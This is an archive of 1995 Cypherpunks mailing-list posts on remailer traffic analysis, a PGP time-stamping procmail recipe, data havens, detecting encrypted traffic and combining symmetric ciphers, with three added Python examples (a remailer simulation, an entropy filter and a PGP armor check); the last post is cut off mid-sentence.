survival by trying to discredit or regulate their talk radio/internet 
competition.

Regards, Skip.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 12 Jan 95 06:02:40 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: analysis of RemailerNet
Message-ID: <Pine.SUN.3.91.950112055457.3862B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been reading through T.C. May's FAQ, and came upon this 
section about analyzing the RemailerNet.

>            + What's needed:
>              - agreement on some terminology (this doesn't require
>                 consensus, just a clearly written paper to de facto
>                 establish the terminology)
>              - a formula relating degree of untraceability to the major
>                 factors that go into remailers: packet size and
>                 quantization, latency (# of messages), remailer policies,
>                 timing, etc.
>              - Also, analysis of how deliberate probes or attacks might
>                 be mounted to deduce remailer patterns (e.g., Fred always
>                 remails to Josh and Suzy and rarely to Zeke).
>            - I think this combinatorial analysis would be a nice little
>               monograph for someone to write.
>    8.10.2. A much-needed thing. Hal Finney has posted some calculations
>             (circa 1994-08-08), but more work is sorely needed.

I think one of the most difficult aspects of analyzing remailers is 
the large number of variables you have to deal with.  In 
contrast, when analyzing ciphers things are pretty much 
static.  The only thing variable you have to worry about is 
key length.  But think of the factors you have to include in 
a complete analysis of the RemailerNet:

1.  different methods of attack
        - passive traffic analysis (i.e., packet sniffing)
        - active attacks: including physical attacks, subverting 
          remailer security, flooding, denial-of-service,
          starting "trap" remailers, etc.

2.  differences at the user level
        - fixed vs random chains vs something in between
        - length of chains
        - numbers of real messages sent
        - numbers of fake (cover) messages sent
        - concerns about latency, bandwidth, and monetary costs
        - acceptability of risk, and benefits of anonymity

3.  differences at the individual remailer level
        - the mixing mechanism: does batched mailing occur by time or by the
          number of messages in the queue, and is there a rollover pool?
        - security: including vulnerabilities to political, 
          physical, and electronic attacks
        - usage level
        - price

4.  differences at the RemailerNet level
        - total numbers of remailers
        - average security (or the number of compromised remailers)
        - total number of users

... and I'm sure there are more.  The number of variables and the 
complex way they're all interrelated make the analysis 
difficult.  Perhaps a good way to go about this is to construct 
simplified models which focus on different aspects.  For 
example, someone pointed out that if you didn't have to worry 
about active attacks, and the attacker can monitor all the 
remailers, then you can treat the entire RemailerNet as a 
single large remailer.  I'm not sure how well this approach 
would work, since I don't know how easy it would be to 
integrate the different simplified models into a realistic one.

Anyhow, this might at least give us some insights, so I'll 
make some attempts in this direction, and post my results.

Just to start things off though, let me try an *extremely*
simple model.

Assume there is just one remailer, it's perfectly secure, and it 
does 4 batches of remailing at equal intervals each day.  There are 
one million users, each of whom receives a mail from the remailer 
once per day.  Alice is sending anonymous mail to Bob through this 
system, also once per day.  But just to be extra careful, she 
also sends a cover mail to the remailer at some other time 
each day, which gets redirected to its /dev/null.

So the situation looks like this on day 1:

            Alice sends     Bob receives     some random user receives
Batch #1:       0                0                   0
Batch #2:       1                1                   0
Batch #3:       0                0                   1
Batch #4:       1                0                   0

Suppose Eve, the traffic analyst, is trying to figure out who 
Alice is sending mail to.  After the first day, she can 
eliminate about half of the remailer users from the list of possible 
targets, because they, like the random user above,
received a mail even though Alice didn't send one out during the 
collection period of that batch.  Now, since Eve can eliminate 
on average half of the list every day, Bob will be the only person left on 
that list after about (log base 2 of one million) = 20 days.

Suppose Alice sent out some different numbers of cover e-mail:

        # of cover mail     # of days to discover Bob
               0               log base 4 of 1,000,000 = 10
               1               log base 2 of 1,000,000 = 20
               2               log base 4/3 of 1,000,000 = 48
               3               log base 1 of 1,000,000 = infinity!

Hopefully that makes sense...  Comments?

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxU0QTl0sXKgdnV5AQFkoAP/SSyqbbDw+zoh+q5aL0+xr5BcLzaEoS4h
NASocZvKHGLe8/sfefDj4J2zPINKhmQzbKdD4oHirPEVbnWZC+7Us3giCKl80t2V
bKx6QPB1hJWi6n3cFme6NCuTjmHCsgrQ/bI2j524O43FhW6BIQAAxQ6GGN10t1V8
3nv3SzUC6jE=
=Y2qv
-----END PGP SIGNATURE-----
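
The single-remailer model from the message above, run as a simulation beside its closed-form estimate; this is an added example and not code from the original post. It assumes every other user's daily mail lands in a uniformly random batch, that Alice's real and cover messages go to distinct batches each day, and that Bob's mail leaves in the batch of Alice's real message; the function names are made up for the illustration.

```python
import math
import random

BATCHES_PER_DAY = 4  # from the post: four equally spaced batches a day


def expected_days(n_users, cover_per_day, batches=BATCHES_PER_DAY):
    """Closed form used in the post: log base batches/(1+cover) of n_users."""
    sending = 1 + cover_per_day          # batches in which Alice sends something
    if sending >= batches:
        return math.inf                  # Alice is active in every batch
    return math.log(n_users) / math.log(batches / sending)


def simulate_days(n_users, cover_per_day, seed, batches=BATCHES_PER_DAY):
    """Days until Eve's intersection leaves only Bob, or None if it never can."""
    sending = 1 + cover_per_day
    if sending >= batches:
        return None                      # no recipient can ever be ruled out
    rng = random.Random(seed)
    suspects = n_users - 1               # users other than Bob still on the list
    days = 0
    while suspects > 0:
        days += 1
        # Batches in which Alice sent a real or cover message today.
        alice_batches = set(rng.sample(range(batches), sending))
        # A suspect stays listed only if their mail arrived in one of them;
        # Bob's always does, so he is never eliminated.
        suspects = sum(
            1 for _ in range(suspects)
            if rng.randrange(batches) in alice_batches
        )
    return days


def mean_simulated_days(n_users, cover_per_day, trials, seed):
    """Average of simulate_days over independent, seeded trials."""
    runs = [simulate_days(n_users, cover_per_day, seed + i) for i in range(trials)]
    return sum(runs) / trials


if __name__ == "__main__":
    n = 10_000  # smaller population than the post's one million, for speed
    for cover in range(4):
        est = expected_days(n, cover)
        if math.isinf(est):
            print(f"cover={cover}: formula=inf, simulation=never")
        else:
            sim = mean_simulated_days(n, cover, trials=20, seed=1)
            print(f"cover={cover}: formula={est:.1f} days, simulated mean={sim:.1f} days")
```

The simulated mean sits a little above the formula because the formula marks the day the expected number of remaining suspects reaches one, while Eve needs every one of them eliminated.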




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 12 Jan 95 06:26:07 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: time stamping service (again)
Message-ID: <Pine.SUN.3.91.950112062429.3862C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My PGP based time stamping service is back online.  I took it 
down a while ago thinking the folks at notary.com (Digital 
Time-Stamp, Inc.) were going to release their commercial 
time stamping product soon (it uses a more elegant protocol that
doesn't require trust in the time stamper, but the algorithm
is patented).  But I haven't heard anything from them 
in a while.

Anyway, it is now running as the following procmail recipe:

:0 w
* ^Subject: Time Stamp This Mail
{
PGPPASS=whateveryourpassphraseis
:0 c w
| (lockfile timestamp.lock ; pgp -fast +batchmode +force +verbose=0 \
+clearsig=off) > timestamp.out
 
:0 a h
| (formail -r -i 'Subject: Time Stamp Output';cat timestamp.out) | \
($SENDMAIL -t ;rm -f timestamp.lock)
}

To use it, just send whatever you need time stamped to me with 
the subject "time stamp this mail".

BTW, can a procmail expert explain to me why the locallockfile 
mechanism doesn't work with this recipe?  If I use :0 w : as 
the first line, procmail will happily ignore the locallockfile 
flag and proceed to munge up timestamp.out, so I have to do 
the filelocking manually.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxU7Zjl0sXKgdnV5AQE1agP/TFGtHEUj6GUwEF1ISGLcUZ/T64Vs7BUJ
PIcydYUDk/5AVPLS2F8r81oLLxDUzYFkVy/6uvhnj6Pvo17ZIx6ELhKNPLPVoLPL
iklR9E7rmY2cRMQfuCPRYi10x4mD9yJcw0GmlQmgOqZS/HfQ30njrsAeDXBUNvA5
SvFBaPKuOro=
=NNoJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 12 Jan 95 04:44:27 PST
To: carolb@barton.spring.com (Censored Girls Anonymous)
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <199501121232.GAA01351@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 2. In order for me to let you store it, I will give it to you
>    anyway you wish to get it.

I will let you store it but in order to access it I get access to your
stores of data.

> 3. I will let you do anything to the data you wish, so long as I  
>    get it back intact.

Actually for a real data haven to work it should not only keep the
original data but any inferences you make with the old data or any new
data you use in the analysis of the old data.

> 5. I would expect to pay money for the safekeeping of my data.

Or provide some service in kind.

> 6. I would expect the longer you hold the data, the more it will cost.

The longer you hold the data the less it is worth.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 12 Jan 95 05:57:08 PST
To: cypherpunks@toad.com
Subject: Re: Cybersmut
In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com>
Message-ID: <950112.065951.0M1.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jya@pipeline.com writes:

[ two horsemen deletia ]

>    Brick said telltale signs of porn being downloaded include: 
>  
>    "If you have a 100-megabyte drive and it's always full and 
>    the kids are demanding more memory. Photos can take a lot 
>    of memory. " 

[ giggle, snort ]

A full 100 meg drive is a telltale sign of a typical Windoze
installation.

Sheesh!  These 'reporters' need a hobby...
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
                   "I'm a family man, model citizen."
                                      -- Warren Zevon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxUoORvikii9febJAQHQOQQAlG3rOFcDP54Wi6IAjBpfu+y3Bq7paB9V
gaTJ5wYG6EkvpkUIoHyimF2NXXpRVRcRJbtsE/bDNRfKV/csifTHlXILNl/IOE6r
RUPxTrHY7r0ubWouy4qdi5i4q4tQ88jOFYQUPu7jPJPfqzC7XX84l5vHMakytx0D
pI9CegILWtY=
=3NRh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Thu, 12 Jan 95 07:38:43 PST
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <199501121537.HAA01536@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>If the encryption method is any good, the output will be pseudo-random
>with no digit being more frequent than any other. This certainly applies
>to IDEA and DES. With RSA, you usually have a random (IDEA) session key
>encrypted using the senders private key. This will also be an effectively
>'random' number.

Just a technical note, but a normal distribution of digits (i.e. 'no digit 
more frequent than any other') is no indication of either randomness or 
'good' encryption.  A better test is to look for a normal distribution at 
all scale levels.  For example, the following text block: "UUU" (in ASCII) 
has a normal distribution at the bit level "0101 0101 0101 0101 0101 0101",
but not at the byte level.

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:04:01 PST
To: cypherpunks@toad.com
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <199501121602.IAA00806@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Censored Girls Anonymous <carolb@barton.spring.com>

   1. You have what I want or need.

You have a _service_ I want to use.

   8. Welcome to the world of data "coatchecking".

"Data coatchecking" certainly has different connotations than "data
haven".  I think for marketing purposes, the name "data haven" is
inaccurate.  A data haven, one might expect, has semantic structure to
it.  Offsite storage is much less than a data haven; it's much more
like a remote file system.

Using the word "haven" to refer to a remote storage facility removes
the connotation of ordinary usage, which, as we all know is a
perfectly upright, normal, and (for those in the USA) a downright
Capital-A _American_ thing to do.

   From the moment the data leaves their hands, until I return it,
   they have no right, nor I no obligation, to divulge anything about it.

You don't want the operator of a remote storage facility revealing
links about usage patterns of individuals, but as far as the data
itself goes, there's no reason it couldn't be made public (there's
also no good reason _to_ make it public, either).  Someone who sends
plaintext to a remote site is foolish.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:09:33 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <ab3a75370402100421a8@[132.162.201.201]>
Message-ID: <199501121608.IAA00812@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   Of course, we're not just dealing with text.  So the scheme has got to be
   changed a bit so as to be able to detect unencrypted GIFs, and mu-law
   files, and as yet to be determined unknown files.  

Each of these data formats has its own regex recognizers available.
Just apply them.

The point, though, is to enforce the presumption that the remailer
operator does not, in fact, look at the traffic in order to understand
the content.  You don't need a completely airtight algorithm in order
to do this.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:14:14 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501120646.WAA28573@ix2.ix.netcom.com>
Message-ID: <199501121612.IAA00824@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

   It's an artificial example, but one that points out that merely doing a 
   frequency analysis on the datastream isn't enough to guarantee the correct 
   answer.

You don't always need the correct answer.  You just need the correct
answer most of the time.  You're trying to create a presumption about
behavior.  Ensuring that you can't read almost all of the traffic is a
pretty good way to assure people that you don't try to make sense of
any of it.

The fundamental purpose here is social communication about intent.

   Reliable remailer software will have to worry about false positives 
   as well as false negatives; especially if it's a fee-for-service operation.

I just don't agree with this.  If you feel it needful to install an
entropy filter, expect that its failures will simply accrue to the
general unreliability measurement for that remailer.

And there's no reason you couldn't publish the algorithm so that a
user couldn't check the entropy for themselves in advance.

   Of course the implicit assumption in that statement is that encrypted 
   traffic hasn't been outlawed or regulated, or that the sender doesn't want 
   to 'appear' to be sending encrypted traffic.

I don't design for the paranoid.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:24:36 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501120607.BAA19021@bb.hks.net>
Message-ID: <199501121623.IAA00846@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: cactus@seabsd.hks.net (L. Todd Masco)

   >Strength is not right aspect.  Global risk is reduced, simply because
   >the aggregate cost of a breach is reduced.

   Isn't it?  If an attacker does not know what cipher is used and breaking
   each is computationally expensive (though not prohibitively so) doesn't
   that add extra complexity?

Suppose that several symmetric ciphers are used and that one of them
is broken.  You then attempt to break all of the messages; the ones
that don't break are presumed to be one of the other ciphers.  So it
does nothing to improve strength.  Note, though, that the _rest_ of
the messages remain unbroken.

I am assuming that it's unlikely that all of the ciphers will be
broken simultaneously.

   Related: is there, in general or in any known specific cases, any
   loss of security in using sym. cipher A on ciphertext B (of another
   sym. cipher) with the same key?  With different keys (I would think
   not, but I vaguely remember mention of something here long ago)?

If you use the same key, the size of exhaustive search does not
increase.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:33:46 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com>
Message-ID: <199501121632.IAA00887@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: paul@poboy.b17c.ingr.com (Paul Robichaux)

   Must I
   require the user to tell that program what cypher was used to encrypt
   the file she wishes to decrypt?

Only if you don't want to store the type alongside.  See below.

   Is storing the cypher type as part of the encrypted file a weakness?

Well, it's no weaker than current systems.  PGP stores the cipher type
in the source code: it's always IDEA.  One should allow, however, the
cipher type to be empty alongside the data so that another tool can
store cipher information.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 08:38:56 PST
To: cypherpunks@toad.com
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120925.C24527-0100000@nesta.pr.mcs.net>
Message-ID: <199501121637.IAA00893@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nesta Stubbs <root@nesta.pr.mcs.net>

   > 3. I will let you do anything to the data you wish, so long as I  
   >    get it back intact.

   why would you give the haven owner free run?  I mean naturally he does 
   have free run with your data once he gets it, 

That's exactly the reason, namely, to make the agreement between
individuals match the underlying nature of information.  This is
different in the trust in silence about the user.  This is also not to
say that the operator can't undertake to make assurances about where
bits go and don't go.

   I am sure you 
   wouldn't want your data stored on a public access Unix system, or in 
   plaintext.

So don't store it in plaintext.  The operator of the data storage
facility has no responsibility for this.

   if the datahaven is turned into a data broker

I don't know about you, but I don't like paying money for random bits.

   well what would be the purpose of this data haven you propose except as an 
   extra storage space for data, like if you don't have space on your own 
   drive?

Even when you've got enough of your own disk space, it's still subject
to failure.  Putting data in multiple places reduces the possibility
of unrecoverable catastrophe.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 12 Jan 95 09:01:09 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501121701.JAA24309@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The data haven concept as I understood it held data for public access in
some form (for sale or for free) which would be illegal in some
jurisdiction.  This might include credit information that was older than
the legal limit, libelous claims, damaging medical records, etc.
Frankly, I suspect that most usages would be directed towards reducing,
rather than increasing, individual privacy.  So this is not an area I am
interested in working towards.

The idea of offsite storage doesn't seem that helpful since you can just
store the data on your own disk in encrypted form.  Maybe if encryption
gets outlawed it would be useful, but then you can't use encryption to
communicate with the haven.

As far as remailers requiring encryption, one purpose would be to reduce
complaints by making it impossible to send some kinds of messages which
people would object to.  It would be hard to post to usenet, for example,
in a useful way.  And mail to private individuals could not contain
obvious obscenities or other objectionable material.

The problem with this is that if people become able to handle and deal
with incoming encrypted mail in a transparent way, this restriction is no
longer effective in the latter purpose.  Someone could get encrypted hate
mail and have it transparently decrypted and displayed just like normal
mail.  They will be just as upset as people are today when they get
objectionable mail from the remailer.

As far as usenet posts, if a particular decryption key were widely and
customarily used in a particular newsgroup, objectionable material
could still be widely read if encrypted with that key.  Tim May's
example of a fake encrypted post containing inflammatory material is a
good example of the heat which could occur, especially when the message
is real and not a fake one like he did.  So I don't think this
restriction would really accomplish the desired goal except perhaps in
the short term.

If the purpose is to have plausible deniability by the remailer
operator, I feel we can still get that by publicizing the remailer
software source, which has no provisions for manual filtering.  A policy
of sending only encrypted mail so that the operator can't filter would
be no more acceptable to critics of anonymity than a policy of just not
filtering at all.

Entropy checking is not adequate to detect encryption, as compressed
files have maximal entropy as well.  For these purposes, compression may
be nearly as good as encryption, except that standard compression formats
are already widely used.  An entropy checker might well pass a gif,
jpeg, or zip file, so this filter would by itself be useless to prevent
posting of unencrypted graphics.  It would probably have to be augmented
at least by some checks for these special file formats.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxVgSRnMLJtOy9MBAQF66wIA3a01avgc0jBjKXH6IMjO+6wj4tBeSUmM
ZeRl+xFZFZ4Cfsrik1ghuHXI31isiHUzrPAIVEZfFIpTw6w9T0QdSQ==
=YVRq
-----END PGP SIGNATURE-----
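
An added example, not part of the original posts: a sketch of the entropy filter discussed in this thread, covering Dale Harrison's "UUU" case (balanced at the bit level, constant at the byte level) and the point above that compressed data passes an entropy check unless known file headers are checked first. The 0.9 threshold, the function names and all sample inputs are assumptions constructed for illustration.

```python
import hashlib
import math
import zlib
from collections import Counter

# Leading bytes of the formats named in the thread (GIF, JPEG, zip), plus gzip.
MAGIC = {
    b"GIF87a": "gif", b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip",
    b"\x1f\x8b\x08": "gzip",
}

def symbols(data: bytes, width: int):
    """Yield the data as a stream of width-bit symbols (width 1, 2, 4 or 8)."""
    mask = (1 << width) - 1
    for byte in data:
        for shift in range(8 - width, -1, -width):
            yield (byte >> shift) & mask

def normalised_entropy(data: bytes, width: int) -> float:
    """Shannon entropy per symbol divided by the symbol width (1.0 = uniform)."""
    counts = Counter(symbols(data, width))
    total = sum(counts.values())
    if total == 0:
        return 0.0
    h = -sum(c / total * math.log2(c / total) for c in counts.values())
    return h / width

def classify(data: bytes, threshold: float = 0.9) -> str:
    """Header check first, then entropy at bit, nibble and byte scale."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return "known-format:" + name
    scales = [normalised_entropy(data, w) for w in (1, 4, 8)]
    return "high-entropy" if min(scales) >= threshold else "low-entropy"

def pseudo_random(n: int, seed: bytes = b"constructed sample") -> bytes:
    """Deterministic stand-in for ciphertext (SHA-256 in counter mode)."""
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

WORDS = ("the remailer operator does not read traffic entropy "
         "filter key message cipher haven data").split()

def sample_text(n_words: int = 20000) -> bytes:
    """Constructed plaintext: words drawn from WORDS by the stream above."""
    return " ".join(WORDS[b % len(WORDS)] for b in pseudo_random(n_words)).encode()

def demo() -> dict:
    """Classify each constructed sample."""
    return {
        "UUU": classify(b"U" * 3000),
        "ciphertext-like": classify(pseudo_random(4096)),
        "plaintext": classify(sample_text()),
        "zlib-compressed plaintext": classify(zlib.compress(sample_text())),
        "gif header + body": classify(b"GIF89a" + pseudo_random(4096)),
    }

if __name__ == "__main__":
    print("UUU bit-level:", normalised_entropy(b"U" * 3000, 1))
    print("UUU byte-level:", normalised_entropy(b"U" * 3000, 8))
    for name, verdict in demo().items():
        print(f"{name:28s} {verdict}")
```

The zlib stream is classified as high-entropy because its two-byte header is not in the MAGIC table, which is the gap the header checks are meant to close.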




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff A Licquia <jalicqui@prairienet.org>
Date: Thu, 12 Jan 95 07:16:58 PST
To: cypherpunks@toad.com
Subject: Knowing Something's Encrypted
Message-ID: <Pine.3.89.9501120950.B3383-0100000@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Maybe I'm missing something here.  If I am, please bonk me.

Here's a simple method for knowing that some data you received is encrypted:

1.  Require a specific method (we'll use PGP in this example).

2.  When a message comes in, check for a PGP format message.  If you 
really wanted to get fancy, you could parse the PGP header a bit to make 
sure the data was really encrypted.

It's true that this isn't "cryptographic" in the sense of testing the 
ciphertext itself, but it should work for the practical goal of enforcing 
a "must be encrypted" rule.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?)   |   Finger for PGP 2.6 public key
jalicqui@prairienet.org          |   Me?  Speak for whom?  You've got
licquia@cei.com (work)           |     to be kidding!
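
An added example, not part of the original post: one way to carry out step 2 above, by removing the ASCII armor, verifying its CRC-24 line and reading the tag of the first packet. An armored message is not necessarily an encrypted one, so the tag is what decides. The packet tag numbers and CRC constants follow the OpenPGP packet format, which the thread does not spell out; the function names and the sample messages are constructed for illustration.

```python
import base64

BEGIN = "-----BEGIN PGP MESSAGE-----"
END = "-----END PGP MESSAGE-----"
# Packet tags that start an encrypted message: public-key and symmetric-key
# encrypted session key (1, 3), encrypted data (9), encrypted data with MDC (18).
ENCRYPTED_TAGS = {1, 3, 9, 18}

def crc24(data: bytes) -> int:
    """CRC-24 used on the armor checksum line."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF

def armor(packets: bytes) -> str:
    """Wrap packet bytes in ASCII armor (used here to build sample input)."""
    b64 = base64.b64encode(packets).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    check = base64.b64encode(crc24(packets).to_bytes(3, "big")).decode()
    return "\n".join([BEGIN, "Version: 2.6.2", "", *lines, "=" + check, END]) + "\n"

def dearmor(text: str):
    """Return the packet bytes of the first armored message, or None."""
    lines = [line.rstrip() for line in text.splitlines()]
    try:
        start = lines.index(BEGIN)
        end = lines.index(END, start)
    except ValueError:
        return None
    block = lines[start + 1:end]
    if "" not in block:                  # armor headers end with a blank line
        return None
    body = block[block.index("") + 1:]
    check = [line for line in body if line.startswith("=")]
    data = "".join(line for line in body if not line.startswith("="))
    try:
        raw = base64.b64decode(data, validate=True)
        if check and base64.b64decode(check[-1][1:], validate=True) != \
                crc24(raw).to_bytes(3, "big"):
            return None
    except ValueError:                   # malformed base64
        return None
    return raw

def first_packet_tag(raw: bytes):
    """Decode the tag from the first octet (old and new packet formats)."""
    if not raw or not raw[0] & 0x80:
        return None
    return raw[0] & 0x3F if raw[0] & 0x40 else (raw[0] >> 2) & 0x0F

def check_message(text: str) -> str:
    if BEGIN not in text:
        return "no-armor"
    raw = dearmor(text)
    if raw is None:
        return "corrupt-armor"
    tag = first_packet_tag(raw)
    if tag is None:
        return "not-pgp-packets"
    return "encrypted" if tag in ENCRYPTED_TAGS else "not-encrypted"

# Constructed samples. Only the first packet header is meaningful; the
# bodies are filler bytes, not real key material or ciphertext.
ENCRYPTED = armor(bytes([0x85, 0x00, 0x8C]) + bytes(range(140)))   # tag 1
COMPRESSED_ONLY = armor(bytes([0xA3, 0x01]) + bytes(range(60)))    # tag 8
TAMPERED = ENCRYPTED.replace("hQCM", "hQCN", 1)                    # CRC now fails

if __name__ == "__main__":
    for name, msg in [("encrypted", ENCRYPTED), ("armored only", COMPRESSED_ONLY),
                      ("tampered", TAMPERED), ("plain", "hello, world\n")]:
        print(f"{name:14s} {check_message(msg)}")
```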





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 12 Jan 95 06:20:29 PST
To: Brad Parsons <parsons@bga.com>
Subject: Re: CBS/C.Chung Plan Hit Job on Internet? (fwd)
In-Reply-To: <Pine.3.89.9501120547.A11756-0100000@ivy.bga.com>
Message-ID: <Pine.SUN.3.91.950112091617.4507C-100000@riemann.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Brad Parsons wrote:

> From: Skip Leuschner <skipl@pacifier.com>

> I see C.Chung's program as one of the first volleys in a new phase of a 
> TV/print media project.

> Internet and talk radio emerged as political forces in the '94 
> election.  If political influence by the media is a zero-sum game, as I 
> believe it is, then the TV and print media must look to their own 
> survival by trying to discredit or regulate their talk radio/internet 
> competition.

Clearly.  I think Time magazine, as they come onto the Internet, is 
realizing that the culture here does not take well to bogus and 
misleading journalism.  The Time reporter who wrote the article on the 
modern militia movement in the US asked on talk.politics.guns what people 
thought about his article - oh my, you've never seen such a flamefest!  
Not to mention the immense amount of pro-firearm opinions on the Time WWW 
talkback area.  For a magazine which has publicly announced that they 
are anti-RKBA, I think they are viewing all of this with some dismay.

That is only a single issue - I think as more standard media groups come 
on-line, they will have to choose either to try to destroy the net 
through demonizing it, or change with it into an adaptive reporting 
system with traditional journalistic ethics.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Thu, 12 Jan 95 07:26:24 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com>
Message-ID: <Pine.3.89.9501120934.B24527-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Jan 1995, Dale Harrison wrote:
> >
> >A practical system would cut out a notch at 6/8 for ASCII armor, which
> >would make approximation techniques a bit tricky.  More practical is
> >just to detect ASCII armor with a regular expression recognizer and
> >de-armor it before the entropy check.
> >
> >Eric
> >
> >
> Won't work!  You can always embed an encrypted message in what 'looks' 
> like plaintext.  A trivial example: Encrypt a message with a caesar 
> cypher, then build a story where the first char of each word maps to 
> each subsequent char from the encrypted text.  At the cost of expanding 
> the size of the message by a factor of 5 to 10 you've hidden the 
> encrypted message in what looks like a letter to your mother (or a news 
> story in the NY Times, etc.)  This is old technique.
> 
> Dale H.

But Dale, that doesn't matter much.  The user is then going out of his way 
to get rejected.  The data haven would be known to its users to require 
encrypted text, and a user who did the scheme you outline above would 
only be succeeding in getting himself rejected.  I mean it's not the 
operator's fault he decided to be snazzy and put it in plaintext when it 
was known to be required to be encrypted, as in knowingly encrypted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Thu, 12 Jan 95 07:36:14 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <Pine.3.89.9501120150.C3416-0100000@barton.spring.com>
Message-ID: <Pine.3.89.9501120925.C24527-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Censored Girls Anonymous wrote:

> 
> 1. You have what I want or need.
> 2. In order for me to let you store it, I will give it to you
>    anyway you wish to get it.
> 3. I will let you do anything to the data you wish, so long as I  
>    get it back intact.

why would you give the haven owner free run?  I mean naturally he does 
have free run with your data once he gets it, but a matter of trust, and 
encryption protects you marginally.

> 4. It is no concern (only idle curiosity maybe) where the data is parked.

it matters a lot to me, that's the security of the data, what if your data 
is some top secret plan to bomb the pentagon, and you are using the data 
haven to distribute to your band of anonymous terrorists, I am sure you 
